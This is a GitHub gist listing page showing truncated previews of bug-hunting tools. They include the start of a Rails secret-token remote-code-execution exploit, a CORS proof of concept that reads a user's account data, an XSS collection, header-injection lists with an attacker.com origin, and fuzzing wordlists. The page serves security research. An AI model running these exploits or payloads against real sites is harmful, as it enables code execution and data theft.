rootxharsh / rails-secret-token-rce.rb

Created July 19, 2018 22:26

Rails Secret Token RCE.

	#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
	require 'base64'
	require 'openssl'
	require 'optparse'
	require 'open-uri'
	SECRET_TOKEN = "SECRET HERE"
	code = "eval('`COMMAND HERE`')"
	marshal_payload = Base64.encode64(
	"\x04\x08" +
	"o" +

marduc812 / sonar_search.sh

Last active September 5, 2019 19:17

	#!/bin/bash

	# Path for the Forward DNS records zip
	source="/root/Downloads/2019-01-25-1548374703-fdns_any.json.gz"

	# Input with dot in front
	in=.$1

	#Check if JQ is installed
	if hash jq 2>/dev/null; then

EdOverflow / ghcheck

Created April 6, 2019 15:26

Quickly determine the validity and scope of a GitHub access token.

	#!/bin/bash

	GREEN='\033[0;32m'
	RED='\033[0;31m'
	END='\033[0m'

	request=$(curl -s -u "hehe:$1" https://api.github.com/user)
	name=$(echo "$request" \| jq -r ".login" 2> /dev/null)
	if [[ $name == "null" ]]; then
	echo -e "${RED}Not a GitHub access token.${END}"

LiveOverflow / fuzz.html

Created April 7, 2019 10:35

Fuzz innerHTML vs. DOMParser

	<html>
	<body>
	<script>
	const tags = ["a", "abbr", "address", "area", "article", "aside", "audio", "b", "base", "bdi", "bdo", "blockquote", "body", "br", "button", "canvas", "caption", "cite", "code", "col", "colgroup", "data", "datalist", "dd", "del", "details", "dfn", "dialog", "div", "dl", "dt", "em", "embed", "fieldset", "figcaption", "figure", "footer", "form", "h1", "h2", "h3", "h4", "h5", "h6", "head", "header", "hgroup", "hr", "html", "i", "iframe", "img", "input", "ins", "kbd", "keygen", "label", "legend", "li", "link", "main", "map", "mark", "math", "menu", "menuitem", "meta", "meter", "nav", "noscript", "object", "ol", "optgroup", "option", "output", "p", "param", "picture", "pre", "progress", "q", "rb", "rp", "rt", "rtc", "ruby", "s", "samp", "script", "section", "select", "slot", "small", "source", "span", "strong", "style", "sub", "summary", "sup", "svg", "table", "tbody", "td", "template", "textarea", "tfoot", "th", "thead", "time", "title", "tr", "track", "u", "ul", "var", "video", "wbr"]

nullenc0de / content_discovery_nullenc0de.txt

Last active April 2, 2025 06:37

content_discovery_nullenc0de.txt

This file has been truncated, but you can view the full file.

	/
	$$$lang-translate.service.js.aspx
	$367-Million-Merger-Blocked.html
	$defaultnav
	${idfwbonavigation}.xml
	$_news.php
	$search2
	£º
	.0
	/0

andripwn / CORS.html

Last active August 15, 2019 08:30

	<html>
	<body>
	<button type='button' onclick='cors()'>CORS</button>
	<p id='demo'></p>
	<script>
	function cors() {
	var xhttp = new XMLHttpRequest();
	xhttp.onreadystatechange = function() {
	if (this.readyState == 4 && this.status == 200) {
	var a = this.responseText; // Sensitive data from niche.co about user account

momenbasel / headersPentest

Last active July 1, 2023 14:28

HTTP headers is the language that all web servers speaks, it can be golden gem for security researcher.

	X-Forwarded-Host
	X-Forwarded-Port
	X-Forwarded-Scheme
	Origin: null
	Origin: [siteDomain].attacker.com
	X-Frame-Options: Allow
	X-Forwarded-For: 127.0.0.1
	X-Client-IP: 127.0.0.1
	Client-IP: 127.0.0.1
	---For injecting BXSS(blind XSS) \|\| SQLI payloads---

yassineaboukir / List of API endpoints & objects

Last active July 18, 2025 19:12

A list of 3203 common API endpoints and objects designed for fuzzing.

BlackFan / Bootstrap_XSS.md

Last active April 17, 2025 14:33

Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

uzeyirdestan / unminify.py

Created February 2, 2020 10:46

React index.android.bundle nicer script

	#!/usr/bin/python3
	#React index.android.bundle nicer script
	#You need to install jsnice tool in order to work.
	#Author: Uzeyir Destan
	import sys
	import os
	if len(sys.argv) < 2:
	print("Usage is %s <file to parse>" % (sys.argv[0]))
	sys.exit(0)
	i=0

hvvva hvvvva